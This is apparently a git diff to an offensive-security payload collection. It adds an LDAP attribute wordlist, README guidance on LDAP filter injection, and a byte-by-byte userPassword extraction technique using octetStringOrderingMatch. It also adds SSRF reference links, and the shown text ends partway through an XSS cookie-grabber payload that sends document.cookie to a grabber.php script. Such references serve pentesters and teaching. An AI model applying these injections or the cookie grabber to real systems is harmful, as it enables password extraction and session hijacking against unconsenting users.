diff --git a/LDAP injection/Intruders/LDAP_attributes.txt b/LDAP injection/Intruders/LDAP_attributes.txt new file mode 100644 index 0000000..472a4ec --- /dev/null +++ b/LDAP injection/Intruders/LDAP_attributes.txt @@ -0,0 +1,9 @@ +userPassword +surname +name +cn +sn +objectClass +mail +givenName +commonName \ No newline at end of file diff --git a/LDAP injection/README.md b/LDAP injection/README.md index 588ddb0..8e33621 100644 --- a/LDAP injection/README.md +++ b/LDAP injection/README.md @@ -66,7 +66,37 @@ We can extract using a bypass login (&(sn=administrator)(password=MYKE)) : OK ``` +## Defaults attributes + +Can be used in an injection like `*)(ATTRIBUTE_HERE=*` + +```bash +userPassword +surname +name +cn +sn +objectClass +mail +givenName +commonName +``` + +## Exploiting userPassword attribute + +userPassword’ attribute in not a string like the ‘cn’ attribute for example but it’s an OCTET STRING +In LDAP, every object, type, operator etc. is referenced by an OID : octetStringOrderingMatch (OID 2.5.13.18). + +> octetStringOrderingMatch (OID 2.5.13.18): An ordering matching rule that will perform a bit-by-bit comparison (in big endian ordering) of two octet string values until a difference is found. The first case in which a zero bit is found in one value but a one bit is found in another will cause the value with the zero bit to be considered less than the value with the one bit. + +```bash +userPassword:2.5.13.18:=\xx (\xx is a byte) +userPassword:2.5.13.18:=\xx\xx +userPassword:2.5.13.18:=\xx\xx\xx +``` + ## Thanks to * [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection) * [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/) +* [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN](https://0xukn.fr/posts/WriteUpECW2018AdmYSsion/) \ No newline at end of file diff --git a/SSRF injection/README.md b/SSRF injection/README.md index bbd3b8a..c49084d 100644 --- a/SSRF injection/README.md +++ b/SSRF injection/README.md @@ -464,3 +464,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se * [PHP SSRF @secjuice](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51) * [How I convert SSRF to xss in a ssrf vulnerable Jira](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158) * [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a) +* [Hacker101 SSRF](https://www.youtube.com/watch?v=66ni2BTIjS8) diff --git a/XSS injection/README.md b/XSS injection/README.md index 3f94d46..f5c7b15 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -19,7 +19,9 @@ Cookie grabber for XSS ```php document.location='http://localhost/XSS/grabber.php?c=' + document.cookie + +or + // Write the cookie in a file $cookie = $_GET['c'];